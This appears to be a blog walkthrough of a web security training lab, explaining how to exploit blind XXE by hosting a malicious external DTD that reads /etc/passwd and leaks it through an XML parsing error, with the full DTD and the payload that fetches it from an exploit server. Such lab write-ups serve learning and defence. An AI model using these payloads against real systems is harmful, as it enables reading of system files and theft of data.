LinkedinGithub

Exploiting blind XXE to retrieve data via error messages

Exploitation

the lab has a "check stock" feature that parses XML input

send to repeater

To exploit that, we can trigger an XML parsing error, and the error message contains the sensitive data, like /etc/passwd.

In the lab, we have an exploit server, which allows us to host a malicious external DTD:

You can trigger an XML parsing error message containing the contents of the /etc/passwd file using a malicious external DTD as follows:

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;

This DTD carries out the following steps:

  • Define an XML parameter entity called file, containing the contents of the /etc/passwd file.

  • Define an XML parameter entity called eval, containing a dynamic declaration of another XML parameter entity called error. The error entity will be evaluated by loading a nonexistent file whose name contains the value of the file entity.

  • Use the eval entity, which causes the dynamic declaration of the error entity to be performed.

  • Use the error entity, so that its value is evaluated by attempting to load the nonexistent file, resulting in an error message containing the name of the nonexistent file, which is the contents of the /etc/passwd file.

now click on view exploit and copy the url which we will use to invoke the DTD

Next, to let the target server invoke our malicious external DTD, we can send the following XXE payload:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "https://exploit-0a8d00b8044992e788e2f0c501070053.exploit-server.net/malicious.dtd"> %xxe;]>
<stockCheck><productId>7</productId><storeId>1</storeId></stockCheck>

Which will:

  • Define an an XML parameter entity called xxe, which fetches our exploit server’s malicious DTD and interpret it inline

now let's go the "check store" request that we have sent to repeater and send this xml payload to invoke the malicious DTD stored in our exploit server

and we have solved the lab

hope you found this walkthrough easy to understand and follow

Greeting From Sayonara

PreviousExploiting blind XXE to exfiltrate data using a malicious external DTDNextExploiting XInclude to retrieve files

Last updated

Was this helpful?